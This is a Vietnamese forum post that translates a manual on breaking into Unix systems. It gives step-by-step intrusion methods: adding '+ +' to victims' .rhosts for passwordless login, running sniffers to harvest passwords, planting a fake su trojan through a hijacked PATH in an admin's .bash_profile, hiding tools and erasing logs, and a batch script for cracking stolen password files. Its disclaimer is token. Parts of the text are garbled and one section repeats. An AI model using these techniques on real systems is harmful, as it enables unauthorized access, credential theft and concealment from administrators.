banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Forum Index Thảo luận thâm nhập Bài cũ: Hack Vào Một Hệ Thống Unix. TG:purplenova  XML
  [Question]   Bài cũ: Hack Vào Một Hệ Thống Unix. TG:purplenova 09/01/2007 01:57:05 (+0700) | #1 | 35075
komodo01
Member

[Minus]    0    [Plus]
Joined: 08/01/2007 07:01:49
Messages: 24
Offline
[Profile] [PM]
Loi noi dau :
Thuc ra thi cuon sach nay se giup cho(aid) cac hacker trong viec dot nhap(break Into) vao cac he thong nhung dong thoi no cung cung cap cac chi dan cho cac admin trong cac van de bao mat va giup do voi nhung thu co the bi xam nhap tren he thong cua ho khoi su xam nhap cua cac hacker.

Neu ban su dung cuon sach nay de co duoc su xam nhap vao bat cu mot he thong nao, noi ma ban khong thuoc ve, va lam bat cu mot loai pha hoai nao , ban se la mot suffer ngu ngoc va don doc.

Toi khong noi voi ban hay dot nhap vao bat cu mot he thong nao, toi chi muon cho ban biet mot so kinh nghiem cua toi va nhung dieu ma toi se lam khi toi truy nhap vao chinh may cua minh

Tot roi, bay gio chung ta hay bat dau.Neu ban co y dinh hack, ban chac chan phai lam viec do vi mot li do nao do. Tat ca cac hacker co li do cho nhung gi ho lam. Hau het la do ham hoc hoi.Hau het nhung gi toi da tung hoc ve Unix, toi da tung hoc duoc tren cac nha cung cap dich vu hay tren cac may tinh cua nhung nguoi khac.I'm one for the "hands on" experience.Co nhieu thu de hoc va ban se phai doc 20.000 quyen sach chi de co duoc nhung gi ban se vo ra nhu mot vai file dinh dang, mot vai thong bao admin email,

O day trong cuon sach nay ban se hoc lam the nao de tro thanh mot hacker hoan hao va tien len bang cach cua chinh ban.Dieu nay khong doi hoi qua lau nhung se phai co mot vai bai luyen tap va kinh nghiem truoc khi ban co the tu goi minh la mot HACKER.

Không phải bất cứ người nào có thể crack được các mật khẩu và xâm nhập vào các may Unix đều được gọi la hacker. OK, ban co the lay quyen truy cap chủ vao mot box ư ! Ban vẫn chưa phải là một hacker ! Dau tien ban can phai biet tai sao ban la mot hacker sau đó phải có luật lệ và phong cách của riêng bạn . Ban can co mot muc dich va mot li do cho viec hack vao bat cu mot box nao.Mot hacker thuc thu biet li do cho nhung hanh dong cua anh ta, nhu lam viec do cho nhung li do nhu vi kien thuc, thông tin miễn phí, va XÂM NHẬP.Mot hacker thuc thu se chuyen việc hack vào truy cập đến rat nhieu cac he thong khac va cac nha cung cap khac nhau va giu viec xam nhap nay cho viec nghiên cứu trong tuong lai va co duoc nhieu hon cac thong tin mien phi!!!

Mot hacker thieu kinh nghiem se khong an minh va se lam nhieu dieu ngu ngoc nhu xoa hay lam sai lech (corupt) cac du lieu, tat may, chay bots hay IRC clients tu account chu.Cong bo password cho moi nguoi de chung minh rang ho co kha nang hack.

Một hacker thực thụ sẽ không cần đến danh tiếng (glory) như vậy, anh ta chỉ cần một "lối vào" và cố gắng giữ lối vào ấy đồng thời tàng hình.Anh ta sẽ không nói với nhiều người về hệ thống đó, anh ta sẽ không công bố mậy khẩu hay tài khoản, anh ta sẽ giwux gìn tât cả các thứ khác để anh ta có thể tiếp tục truy cập vào hệ thống và làm no sach sẽ.

Ở đây trong cuốn sổ này tôi hi vọng tôi có thể đưa ra đầy đủ các phong cách khiến ban có thể xác định cho mình mọt lối đi đúng (have a real heart in thí matter) và hãy là một hacker trong sạch.

Bài viết gồm các phần cơ bản sau

[*]Chuong 1 : Cac lech UNIX co ban

[*]Chuong 2 : Bat dau voi account dau tien cua ban

[*]Chuong 3 : Lay cac file password

[*]Chuong 4 : Lay cap root account

[*]Chuong 5 : Làm cho bạn vô hình

[*]Chuong 6 : Xóa dấu vết

[*]Chuong 7 : Giữ quyền truy cập

[*]Phu luc1 : Nhung dieu nen lam sau khi xam nhap

[*]Phu luc2 : hack\www an toan\cac FTP site

[*]Phu luc3 : Thêm nữa trong việc khai thác từ root và các truy cập khác

[*]Phu luc4 : Cac tien ich khac cho he thong Unix

[*]Phu luc5 : Các khai thác khác từ UNIX

[*]Phụ lục6 : UUENCODED FILES

1. Cac lenh Unix co ban can biet:
Chi co mot vai lenh co ban ban can hoc, va sau do mot vai chuong trinh unix co the giup ban trong viec log hay gtipe tuc xam nhap vao may chu.

Hay goi nha cung cap dich vu Internet cuc bo cua ban va hoi ho ve viec mua mot account de ma ban co cai gi do de ma thuc hanh .shell account co the co gia khoang 10$ mot htnag.

* A. Cac lenh co ban
Toi hi vong ban da co mot so kien thuc co ban ve DOS, dieu nay cung co Ich va toi se cho rang\mac dinh rang (assume) ban da biet khi viet cuon sach nay…
DOS command ban thuong dung la:

QUOTE
Hãy nhớ rằng : Unix nhay cam voi cac ki tu(case sensitive) , vi vay neu toi day su dung mot chu thuong(lower case) thi ban cung phai lam vay, neu toi su dung mot dau cach thi ban cung phai lam nhu the. DOS thì cho phep ban lam kieu gi cũng duoc nhưng UNIX thì khong.



DIR/W = ls
DIR = ls -l
DIR/AH = ls -al (voi AH=hidden ; -al=Include hiddenfilesaswellas regular )
RENAME = mv
ATTRIB = chmod
MD = mkdir
RD = rmdir
DEL = rm
COPY = cp

Do la cac lenh co ban, toi khuyên ban hay tra cac 'man pages' tren moi lenh trong so nay tu shell cua ban. Ban lam dieu nay bang cach danh vao lenh "man command".

Moi lech trong so nay co mot công tắc của nó, vi du nhu cp -R dung de copy files va cac thu muc. Cung vay, ban danh vao man cp de biet duoc tat ca cac công tắc (switch) ban co the su dung voi lenh copy…

cd {then press enter} se dua ban den thumuc goc cua minh.
cp {file name} $HOME se copy file nao do den thu moc goc cua bna
cd ~username se dua ban den thu muc goc cua nguoi su dung nao do neu ban truy cap de o do.
pwd {press enter} se cho ban biet ban dang o dau…
* B. TELNET
Telnet la mot lenh ma ban co the su dung tu shell cua ban, hay tu mot file chay(telnet.exe) trong windows, OS/2 ,win95 hay cac he dieu hanh khac va`cho phep ban truy cap vao cac may tinh khac tren net. Co cac chuong trinh khac ban se hoc den nhu FTP , va rlogin nhung thu ma ban su dung kha tot nhung bay gio chung ta hay su dung telnet.

Ban co the su dung telnet neu ban biet IP address hay host name ma ban muon connect hay login. De su dung lech ban se chi viec su dung chuong trinh telnet de connect den mot IP hay host nhu the nay :
Telnet net.com or telnet 206.146.43.56
OK bay gio chung ta hay login


QUOTE
Telnet machine.com
Trying….
Connected to machine.com
Linux 2.0.28 (machine.com) (ttyp0)
Machine login: username
password:######
bash$


Cac lenh cua ban co the trong se khac, nhung chung toi se dung cai nay…

Chu y o tren rang hệ thống sẽ cho bạn biết OS khi ban dua ra lenh login.Bạn có thể sẽ cần biết điều này khi bạn có được một bộ sưu tập lớn các files password. Tham chi truoc khi tiep tuc crack chung, phan loai chung theo cac kieu O/S chi bằng việc telnet den chung de xem chung dang chay thu nao.Co cac cach khac, nhung hay de muc telnet này tiep tuc trong mot giay…
telnet domain.name.com, sau khi ban thay duoc chugn dang chay thu gi hay chu y dieu nay va bam ctrl] de thoat khoi ket noi.

Đầu tiên đặt tất cả các linux password file vao mot đống(pile) để crack .Tat ca nhung gi chung ta can la mot account đang làm việc cho hệ thống, va chung ta co the hau nhu chac chan rang chung ta se co quyen dieu hanh tren may chu!! Những cách dẫn dến các lỗ hổng trong linux làm chúng ta nghĩ rằng chung ta se không thể sở hữu một trong số các máy chủ đó, vi vay hay cùng làm việc để co the bat đầu the gioi hacking tuyet voi nay.

Unix files permission


QUOTE
bash$

bash$ cd /tmp
bash$ ls -l
total 783
-rwx------¦nbsp; 1 wood¦nbsp; ¦nbsp; users¦nbsp; ¦nbsp; ¦nbsp; ¦nbsp; ¦nbsp; 1 Jan 25 18:28 19067haa
-rw-r--r--¦nbsp; 1 berry¦nbsp; ¦nbsp; mail¦nbsp; ¦nbsp; ¦nbsp; ¦nbsp; ¦nbsp; ¦nbsp; 1 Jan 16 12:38 filter.14428
-rw-------¦nbsp; 1 rhey19¦nbsp; root¦nbsp; ¦nbsp; ¦nbsp; 395447 Jan 24 02:59 pop3a13598
-rw-------¦nbsp; 1 rhey19¦nbsp; root¦nbsp; ¦nbsp; ¦nbsp; 395447 Jan 24 03:00 pop3a13600
drwxr-xr-x¦nbsp; 4 root¦nbsp; ¦nbsp; root¦nbsp; ¦nbsp; ¦nbsp; ¦nbsp; 1024 Jan 12 13:18 screens



chu y dau tien la chugn ta su dung dau / chu khong phai dau \ de chuyen thu muc tmp! Unix su dung / nhu la mot root, dieu nay lac hau hon so voi DOS bây giờ.
Hay chu y rang chung ta go ls -l cho thu muc da`i.Neu chung ta go ls chugn ta se thay nhung gi nhu duoi day
bash$ ls
19067haa filter.14428 pop3a13598 pop3a13600 screens
Voi nhung gi chung ta thay o day toi khong the noi duoc gi nhieu, vi vay chung ta se dung ls -al voi -al chúng ta sẽ nhìn thay cả các file ẩn, va cac thu muc ẩn luon luon bắt đầu voi một dấu chấm(.). Bay gio hay xem:


QUOTE
bash$ ls -al
total 794
drwxrwxrwt¦nbsp; 4 root¦nbsp; ¦nbsp; root¦nbsp; ¦nbsp; ¦nbsp; ¦nbsp; 8192 Jan 25 23:05 .
drwxr-xr-x¦nbsp; 22 root¦nbsp; ¦nbsp; root¦nbsp; ¦nbsp; ¦nbsp; ¦nbsp; 1024 Dec 28 18:07 ..
-rw-r--r--¦nbsp; 1 berry¦nbsp; ¦nbsp; users¦nbsp; ¦nbsp; ¦nbsp; ¦nbsp; ¦nbsp; 6 Jan 25 23:05 .pinetemp.000
drwxr-xr-x¦nbsp; 2 berry¦nbsp; ¦nbsp; users¦nbsp; ¦nbsp; ¦nbsp; ¦nbsp; 1024 Jan 25 23:05 .test
-rwx------¦nbsp; 1 wood¦nbsp; ¦nbsp; users¦nbsp; ¦nbsp; ¦nbsp; ¦nbsp; ¦nbsp; 1 Jan 25 18:28 19067haa
-rw-r--r--¦nbsp; 1 berry¦nbsp; ¦nbsp; mail¦nbsp; ¦nbsp; ¦nbsp; ¦nbsp; ¦nbsp; ¦nbsp; 1 Jan 16 12:38 filter.14428
-rw-------¦nbsp; 1 rhey19¦nbsp; root¦nbsp; ¦nbsp; ¦nbsp; 395447 Jan 24 02:59 pop3a13598
-rw-------¦nbsp; 1 rhey19¦nbsp; root¦nbsp; ¦nbsp; ¦nbsp; 395447 Jan 24 03:00 pop3a13600
drwxr-xr-x¦nbsp; 4 root¦nbsp; ¦nbsp; root¦nbsp; ¦nbsp; ¦nbsp; ¦nbsp; 1024 Jan 12 13:18 screens

.pinetemp.000 is a hidden file, and .test is a hidden directory.

-rw-r--r--¦nbsp; 1 berry¦nbsp; ¦nbsp; mail¦nbsp; ¦nbsp; ¦nbsp; ¦nbsp; ¦nbsp; ¦nbsp; 1 Jan 16 12:38 filter.14428

row 1¦nbsp; ¦nbsp; ¦nbsp; ¦nbsp; ¦nbsp; row2¦nbsp; ¦nbsp; row3



Bay gio chung ta can fai hoc ve su cho phep(permission) nguoi su dung(user) va nhom(group)


QUOTE
Row #1 is the file permissions
Row #2 is who owns the file
Row #3 is the group owner of the file


File permission duoc nhom vao ba nhom khac nhau. Neu dong lech bat dau voi 'd', thi do la mot thu muc, neu khong co 'd' thi do la mot file.

QUOTE
| |¦nbsp; |¦nbsp; |--------> Other = anyone on the machine can access
| |¦nbsp; |------------> Group = certain groups can access
| |----------------> User¦nbsp; = only the owner can access
|------------------> Directory Mark

- rw- r-- r--
| |¦nbsp; |¦nbsp; |--------> Other can only read the file
| |¦nbsp; |------------> Group can only read the file
| |----------------> User¦nbsp; can read or write to the file
|------------------> It is not a directory


- rwx rwx r-x
| |¦nbsp; |¦nbsp; |--------> Other can read and execute the file
| |¦nbsp; |------------> Group can read write and execute the file
| |----------------> User¦nbsp; can read write and execute the file
|------------------> It is not a directory


Nguoi so huu (the owner) la ten nguoi su dung trong dong #2 va nguoi so huu nhom la ten trong dong #3.Trong DOS file co phan mo rong la .exe , .bat , .com …or .bat de chay, nhung trong unix tat ca nhung gi ban can la -x trong nhom cua ban trong user, other,group.

Ban co the thay dổi nhũng su cho phep nay neu ban so huu file hay co quyen tuy cập root :
––––––––––––––––––––––––––‼br /> ?––––––––––––––––––––––––––⼢r />??–––––––––––––––––––––
Chmod oug+r file name : sẽ làm cho cả ba nhóm cho phép có thể đọc dược file
Chmod oug-r filename : se lam cho file chi co the doc duoc doi voi những user sở hữu file.(chu y dau - hay + de dat cho file la co hay khong)

Chmod +x filename : se lam file co the chay boi tat ca

Chown username filename : se lam file duoc so huu boi nguoi s/d khác
Chgrp proupname filename : lam file duoc so huu boi nhom khac
––––––––––––––––––––––––––‼br /> ?––––––––––––––––––––––––––⼢r />??––––––––––––––––––––––

Hay chac chan giu trật tự (perm) va cac nhom khong thay doi hoac la ban se bi danh hoi ra(sniff out) va bi boot văng khỏi hệ thống. Thay dổi nhận dạng trên hệ thống có thể chỉ phá vỡ các chức năng khác, vi vay đừng có để lại "dấu vân tay" của mình hoặc là bạn sẽ bị hỏi thăm sức khỏe (or u r just áking to get caught) …Chi lam nhung gi ma ban chac chan, chi dung nhung lenh ma ban biet, ban co the tu tim ra rang danh hang gio de sua mot typo nhu chown -R username /* co the lam ban ban suot mot nam day.J

Hay can than!

Chung ta se di sau hon vao mảng này chi sau khi chung ta biết nhiều hon nhung gi can thiet cho no'

* C. Rlogin
Co mot lenh khac ma ban co the su dung va chung ta se di vao noi nay khi chung ta dung rlogin de login vao hethong ma khong can password!!

Bay gio ban doc man pages tren rlogin bang ach danh lenh man rlogin tu shell cua ban.

lenh tong quat la :


QUOTE
rlogin -l username hostname
connecting….
password

bash$


rlogin doi hoi nguoi su dung phai co mot file trong thu muc goc cua ho file nay cho biet chung co the nhan rlogin tu he thong nao.Trong file này .rhosts se trông nhu thế này :

username hostname (hay) host name

neu ban da them vao file nay ++ thi no se cho phep bat cu nguoi s\d nao o bat cu host nao cung co the login ma khong can password.
file do trông nhu sau :

QUOTE
----- cut here ------
+ +
_____ cut here ------


Nếu họ đã có đầu vào của mình rồi bạn có thể thêm + + ben duoi host name cua ho, nhung hay nho rang luc do ho se de y rang ho da co the rlogin ma khong can password. Ban se nhắm vào những người không có .rhosts file.

* D. FTP

Mot cach khac de login la FTP. Ban co the su dung mot may tram dung windows, hay chi login tu mot shell.


QUOTE
Ftp ftp.domain.com



Dieu nay se cho phep ban download hay upload file den site ma ban dang hack. Chi can chac chan edit xferlog (xem chuong 6) de quet sach cac dau vet cua ban tren he thong. HAY NHO khong bao gio FTP hay TELNET ra khoi he thong da bi hack, ban chi nen log vao no thoi!!!Neu ban di ra tu he thong cua ban hay tu mot account bi hack khac ban da vo tinh dua login va password cua minh cho quan tri mang hay cho cac hacker khac tren he thong cua ho. Do co the la mot telnet hay mot ftp trojan duoc cai tren he thong, hay tham tri la mot phan mem do tham(sniffer). Nao bay gio ban hay dua pass va login cho mot ai do, va neu do la mot admin thi ho se nghi ra nhung cuoc tra thu ngot ngao danh cho ban.J

Su dung ftp tu mot shell, toi khuen cao ban nen su dung mot vai lenh:
Sau khi login, va co duoc dau nhac, danh lenh nay :

prompt (allow u to type a command like (mget *) or (mput *) and transfer an entire directory without havin' It prompt u for each file yes or no.)
hash (se đặt các hash mark (tức là các dấu ####) trên màn hình để bạn có thể thay duoc su truyền tải file đang diễn ra va dang o tốc độ nào.)
bin (chac chan rang ban lay cac file ve o che do dung, va neu chuyen ca'c file do*n, ban se chac chan chung khong bi ne'n)

Cac lenh truyền tải khá đơn giản, lấy tên file hay dat ten mot hay nhieu file ban co the su dung cac thẻ thông thường với lênh mput hay mget

* E. Trinh bien soan GCC
Se co nhung luc ban can phai bien soan mot file .c

Tot nhat la hay bien soan tren chiec may ma ban dang dung. Vi vay hay upload hay copy va paste cac file ra mot hacked bos va bien soam chung o do. Neu ban gap van de voi cac triinh bien soan cua chung ban co the upload cac file da duoc bien soan tu truoc(pre-compiled files)

E. Trinh bien soan GCC
Se co nhung luc ban can phai bien soan mot file .c

Tot nhat la hay bien soan tren chiec may ma ban dang dung. Vi vay hay upload hay copy va paste cac file ra mot hacked bos va bien soam chung o do. Neu ban gap van de voi cac triinh bien soan cua chung ban co the upload cac file da duoc bien soan tu truoc(pre-compiled files)

Một cách để lấy được files trên máy victims là sử dụng copy và paste. Hãy lấy một TSR tốt hay một shareware cho windows để làm việc này nếu bây giờ bạn không biết làm cách nào để làm viẹc này. Bạn có thể copy một script file từ một cửa sổ và paste nó vào một trình biên dich trên máy victim và sau đó thì biên soạn một file mới. Có một típ cho bạn ở phần này, kô cần upload log của các file. Bạn có thể copy và paste từ máy của victim tốt đến nỗi không cần dơnload các log của các file ASCII.
Để copy và paste bạn chỉ cần mở một trình biên soạn trên box hack được copy đoạn scirpt của bạn và paste vào editor sau đó save file lại .This way there will not be anything in the xferlog yet. (Khiếp lão invisible-evil cẩn thận gớm)
Bạn có thể làm y hệt trong password file, nếu bạn quyết định dơnload nó bằng ftp hãy copy nó về thư mục gốc của bạn dưới một cái tên khác.

bash:/etc:> cp passwd $HOME/plog 
Lệnh này sẽ copy file tên là passwd từ thư mục /etc bạn đang đứng về thư mục gốc của bạn với tên plog thay cho tên passwd

Một cách khác để lấy file hoặc đưa file lên mà không để lại dấu vết (without showing up in the logs) là mở một IRC session trên máy các victim sau đó từ một sesion khác của bạn, nơi mà bạn đã làm một user của IRC, hãy send file sử dụng dcc. Cú pháp là :
Để send file
/dcc send <nick> <file name> 

Để lấy file
/dcc get <nick> <filename> 


Sẽ tốt hơn nếu bạn có một bot (theo người dichk có lẽ là một trojan) được đưa lên IRC khi bạn đang hack , khi đó bạn chỉ việc send file đến bot đó và để cho nó tự động nhận chúng. Bot là một chương trình robot mà bạn có thể nạp ở background của shell account của bạn, nó sẽ nhận file, giữ cho các kênh liên lạc luôn luôn mở...vv

Trình biên soạn GCC thật dễ dàng...
gcc filename.c -o filenamebanmuondat 


Nếu tôi phải biên dịch một file có tên z2.c, có chức năng hạ gục các logfile tôi sẽ gõ như sau:
gccz2.c -o zap 

Lệnh này sẽ cho tôi một file chạy có tên zap
Nếu tôi chỉ gõ
gcc z2.c

tôi sẽ nhận được một file chạy có tên a.out, và tôi phải đặt tên lại cho nó là zap, hoặc tôi có thể biết được một vài cái tên bằng cách làm như sau:
mv a.out zap 

Vậy là tôi đã có một cái file chạy tên zap thay cho file a.out.
Bạn phải chắc chắn rằng bạn sẽ chọn một cái tên mà hệ thống của admin không biết. Nếu bạn có một trình đánh hơi có tên "linuxsniffer.c"
mà bạn không muốn đặt cùng một tên , hãy đặt nó với cái tên đại loại như:
gcc linuxsniffer.c -o lsn 


Hãy nhớ rằng thỉnh thoảng baj cũng có thể chạy các tên file này ngay trên thư mục bằng cách gõ tên file , như trình đánh hơi "lnsn" ở trên thì gõ lsn. Tuy nhiên thỉnh thoảng nó cũng không làm việc nếu bạn không thêm ./ (dot slash) vào câu lệnh..VÌ vậy hãy nhơ thỉnh thoảng hãy thêm ./ vào trước file name (./lsn)
Chương II : Bắt đầu
Có rất nhiều cách để lấy được một account xuất phát(starter account). Tôi sẽ đi vào từng khu vực một để giúp bạn bắt đầu. Tất cả những gì bạn cần là một account tốt để từ đó đẻ ra hàng trăm account khác. Hãy nghĩ về cái này, bạn có được một hệ thống có thể khai thác tốt, hầu như là bất cứ cái nào dùng Linux đều có được đặc điểm đáng yêu như vậy .

Bấy giờ bạn lấy quyền truy cập chủ và nạp vào một chương trình đánh hơi. Trình đánh hơi TCP này sẽ tìm ra bất cứ một quá trình login nào trên hệ thống và ghi lại cuộc đăng nhập đó cùng với password của bất cứ thứ gì ra vào hệ thống như telnet, ftp, dial-in session...
Thậm chí nếu đó chỉ là một kết nối ethrnet nhỏ, bạn sẽ co khoảng 100 password cho một vài máy hay domains. Với một mạng lớn hơn thì sẽ cung cấp cho bạn hàng trăm account trên toàn thế giới !! Xin nhắc lại : tất cả những gì bạn cần là một account tốt cho một hệ thống có khả năng khai thác (exploitable system). Nếu có vẻ như bạ không thể khai thác được root trên hệ thống đó, thì đây có thể là một hệ thống tốt cho việc crack password và chuyển đổi account này sang một account khác của các hacker hay những người sử dụng IRC, những người đang muốn nạp lên một bot nhưng không có shell account hay disk space để làm việc này. Không bao giờ công bố dù chỉ một password của một system bạn đã khai thác được root.
Hãy giữ những hệ thống đó cho riêng mình.

Bây giờ chúng ta hãy đi vào tìm hiểu các cách để lấy được những account đầu tiên

A. Cracking các file password
Nếu bạn đang hack với một trí tuệ được tổ chức tốt (hacking with the right frame of mind) , bạn sẽ chạy các chương trình crack cho đến khi bạn có được một account tốt, thứ sẽ cho phép bạn vào được hệ thống.
Bạn sẽ đăng nhập và xem liệu bạn có thể khai thác root trên system này không, nếu được hãy lấy root, lấy các file cần thiết để vào các thư mục ẩn (nested dir), xóa dấu vết của bạn (presence), và xóa sạch các log. Và bấy giờ bạn đã sẵn sàng để nạp vào trình đánh hơi của mình.
Tại sao tiếp tục hack password cho một system mà trong vòng 24h chắc chắn bạn sẽ có hầu hết các password ? Không chỉ đối với các máy bạn đã hack mà cả với những máy đã được connect đến những máy đó nữa . Nếu một hệ thống không thể khai thác được thì đừng phí thời gian với nó nữa, hãy tiếp tục với cái tiếp theo. Một ngày gần đây, nếu bạn muốn crack password cho các account cho mục đích thương mại, hãy tiến lên !!!
Nếu bạn có được một tài khoản admin đã được crack , bạn có thể muốn đọc các file history của anh ta và xem xem liêu có phải anh ta đang sử dụng các lệnh su (su command) trong việc truy cập vào các phần gốc (root allot) hay không, nếu có thì bạn có thể sử dụng một su trojan trên account của anh ta. Thứ này sẽ cho bạn root password. Việc này làm như sau: Bạn thay đổi các script của shell anh ta để các thư mục ẩn (.term - các đơn vị thư mục có dấu chấm đằng trước)trở nên dễ chịu hơn, có nghĩa là chúng sẽ tập hợp tất cả trong đường dẫn tìm kiếm trước tất cả các thư mục khác. Bạn đặt một su nhị phân giả mạo trong một thư mục .term nào đó. Anh ta gõ su, mọi thứ có vẽ diễn ra tốt(đối với anh ta), anh ta gõ vào root password khi đựoc hỏi, nhận dạng của password (pass id) được copy vào một log file trong thư mục /tmp/.elm69 và xóa đi file trojan su, sau đó trả về cho anh ta lỗi password và bảo anh ta hãy thử lại. Admin nghĩ rằng mình đã gõ gì đó sai và chạy su lại, nhưng lần này sẽ là trình su thật và anh ta sẽ login bình thường (hix đọc đoạn này thấy giống mấy bác nhà ta làm trang fake yahoo quá hehe:d).
Các bạn sẽ tìm thấy chương trình giả su này trong phụ lục 6 (uuencoded files)
Sau đây là hướng dẫn sử dụng :
Fake SU by Nfin8 - i-e

IRC: /msg i-e

Easy as 1,2,3 ...

1. Đổi đường dẫn của một trong các user account bạn có quyền truy cập,
2. Chắc chắn rằng chỉnh sửa phần đầu của file su.c thành đường dẫn bạn sẽ sử dụng để chắc chắn rằng su trojan sẽ tự delete nó và để cho trình su thật sự làm việc sau lần gõ pass thứ hai của admin.
3. Đặt tất cả các file trong thư mục đích và biên dịch file su.c

QUOTE
gcc su.c -o su


Sau đó delete tắt cả các file trừ file su. Tất cả đã hoàn tất !

.bash_profile sẽ trông như thế này :

QUOTE
# .bash_profile

# Get the aliases and functions
if [ -f ~/.bashrc ]; then
¦nbsp; ¦nbsp; ¦nbsp; ¦nbsp; . ~/.bashrc
¦nbsp; ¦nbsp; ¦nbsp; ¦nbsp; ¦nbsp; ¦nbsp; ¦nbsp; ¦nbsp; fi

# User specific environment and startup programs

PATH=$PATH:$HOME/bin
ENV=$HOME/.bashrc
USERNAME=""

export USERNAME ENV PATH



Bạn hãy chuyển dòng đầu tiên thành :

QUOTE
PATH=$HOME/.term:$PATH:$HOME/bin



Khi system amdin chạy su, nó sẽ chạy su trojan trong thư mục .term trước và thông báo rằng anh ta đã gõ sai password, trojan sẽ đặt một file ẩn trong thư mục /tmp cho bạn, trong đó có chứa root password (hoặc password của account) vừa được gõ..Nếu nó chỉ là một account chứ không phải là một root password, thì ít nhất nó sẽ cho bạn biết tên account đó. Sau đó su trojan sẽ tự động xóa và lần tiếp theo trình su thật sẽ hoạt động bình thường.
Bạn có thể tìm thấy của admin ở phần đầu tiên của file password trong thư mục /etc. Chỉ việc gõ : more passwd.
Bạn có thể chắc chắn rằng hai account "thực" (real account) đầu tiên trong file password là của admin. cũng thê bạn có thể tìm thấy những cái khác trong những thư mục được liệt kê trong password file. Kiêu như /staff/username.
Các file history được đặt trong các thư mục của các user account tương ứng. Bạn có thể xem chúng bằng cách xem những lệnh cuối cùng được user gõ là gì. Thỉnh thoảng sẽ lên đến 100 lệnh.Hãy tìm file .bash_history hoặc file History, bạn có thể đọc chúng bằng cách sử dụng lệnh more

QUOTE
more .bash_history


hoặc để nhanh hơn bạn có thể gõ :

QUOTE
more .b* hoặc more .b (sau đó ấn nút tab trên bàn phím)


OK, và bây giờ bạn cần một chương trình crack password tốt. Bạn có thể đọc được ở chương sau cách để lấy các file password từ các hệ thống mà không có một account nào online. Tuy nhiên bạn vẫn phải cần có một trình crack password.
Tất cả những gì cần thiết là:
1. Một chường trình crack password
2. Các file ngân hàng từ(word files)
3. Các file password.

Chương trình crack pass tôt nhất để bắt đầu là crackerjack. Bạn có thể search nó và download một cách dễ dàng như đếm 1,2,3..Nếu có kinh nghiệm hơn nữa bạn có thể download cjack cho Unix và chạy nó trên shell của mình. Tuy nhiên nếu bạn mới bắt đầu hãy dùng DOS/OS/2 version.
Cũng có thể tìm lấy vài word file tốt, các password file tốt nhất là các file chứa các tên, bạn có thể nhận ra rằng hầu hết những password không an toàn la tên của bạn trai hay bạn gái . Bạn có thể tìm các wordfile đại loại như 'familynames' 'babynames' 'girlsnames' 'boysnames' 'commonpasswords'
hackersdict' và bất cứ thứ gì giông như vậy...
Nạp crackjack như sau :

QUOTE
[D:\jack]jack

Cracker Jack version 1.4 for OS/2 and DOS (386)
Copyright © 1993, The Jackal, Denmark

PWfile(s) : domain.com.passwd

Wordfile : domain.com.passwd


Ở trên đầu tiên ta chạy password file như là một word file, việc này sẽ cho bạn tất cả các logon ban đầu, những cái mà có username và password login giống nhau. .Cũng tương tự, nếu họ sử dụng bất cứ một thông tin nào khác như tên thật, tên công ty, nó cũng sẽ bị liệt kê ra và bạn sẽ không phải mất công tìm đến các wordfile nữa.
Nếu bạn muốn làm rối tung các word file lên để có được những từ bên ngoài chúng , hãy đọc hướng dẫn của crackjack.
Trộn (Hashing) là việc bạn bảo với crackjack thay đổi trạng thái của word file hoặc thậm chí thêm các chữ cái, chữ số vào trước hoặc sau các từ trong word file , ví dụ sandy1 hay 1 sandy. Bạn sẽ thấy rằng rất nhiều user dùng cách này và nghĩ rằng họ đã an toàn hơn.
Dưới đây là các hashing file dành cho cả password file và danh sách các từ. Sau khi xem qua một lượt bạn sẽ biết cách làm sao để thay đổi chúng hoặc tạo ra những cái mới phù hợp với nhu cầu của bạn.

------------ start of dicthash.bat
@echo off
cls
echo - THIS FILE FOR DOS MACHINES
echo ----------------------------------------------------------------------
echo - To work this batch file have all of the crackerjack files in the
echo - current directory with this batch file, along with your dict and
echo - password file. Then use this batch file using the following format:
echo -
echo - dicthash.bat dictfilename.ext passwordfilename.ext
echo -
echo - Make sure to have the jpp.exe and jsort.exe files in your dir as well.
echo -
echo - dicthash will first load jack running the dict file against your
echo - password file in both cases, then it will add numbers 0-9 both to
echo - the begining and end of every dict word. This will take a while,
echo - so go out for that week vacation!
echo -
echo - If you get tired you can 'ctrl c' to the next option or number.
echo -
echo - ii@dormroom.pyro.net
echo -
echo - Mail me some of your hits, let me know how this works for you smilie

jpp -lower %1 | jack -stdin %2
jpp %1 | jack -stdin %2
jpp -dot:0 %1 | jpp -translate:.1 | jack -stdin %2
jpp -dot:7 %1 | jpp -translate:.1 | jack -stdin %2
jpp -lower -dot:0 %1 | jpp -translate:.1 | jack -stdin %2
jpp -lower -dot:7 %1 | jpp -translate:.1 | jack -stdin %2
jpp -dot:0 %1 | jpp -translate:.2 | jack -stdin %2
jpp -dot:7 %1 | jpp -translate:.2 | jack -stdin %2
jpp -lower -dot:0 %1 | jpp -translate:.2 | jack -stdin %2
jpp -lower -dot:7 %1 | jpp -translate:.2 | jack -stdin %2
jpp -dot:0 %1 | jpp -translate:.3 | jack -stdin %2
jpp -dot:7 %1 | jpp -translate:.3 | jack -stdin %2
jpp -lower -dot:0 %1 | jpp -translate:.3 | jack -stdin %2
jpp -lower -dot:7 %1 | jpp -translate:.3 | jack -stdin %2
jpp -dot:0 %1 | jpp -translate:.4 | jack -stdin %2
jpp -dot:7 %1 | jpp -translate:.4 | jack -stdin %2
jpp -lower -dot:0 %1 | jpp -translate:.4 | jack -stdin %2
jpp -lower -dot:7 %1 | jpp -translate:.4 | jack -stdin %2
jpp -dot:0 %1 | jpp -translate:.5 | jack -stdin %2
jpp -dot:7 %1 | jpp -translate:.5 | jack -stdin %2
jpp -lower -dot:0 %1 | jpp -translate:.5 | jack -stdin %2
jpp -lower -dot:7 %1 | jpp -translate:.5 | jack -stdin %2
jpp -dot:0 %1 | jpp -translate:.6 | jack -stdin %2
jpp -dot:7 %1 | jpp -translate:.6 | jack -stdin %2
jpp -lower -dot:0 %1 | jpp -translate:.6 | jack -stdin %2
jpp -lower -dot:7 %1 | jpp -translate:.6 | jack -stdin %2
jpp -dot:0 %1 | jpp -translate:.7 | jack -stdin %2
jpp -dot:7 %1 | jpp -translate:.7 | jack -stdin %2
jpp -lower -dot:0 %1 | jpp -translate:.7 | jack -stdin %2
jpp -lower -dot:7 %1 | jpp -translate:.7 | jack -stdin %2
jpp -dot:0 %1 | jpp -translate:.8 | jack -stdin %2
jpp -dot:7 %1 | jpp -translate:.8 | jack -stdin %2
jpp -lower -dot:0 %1 | jpp -translate:.8 | jack -stdin %2
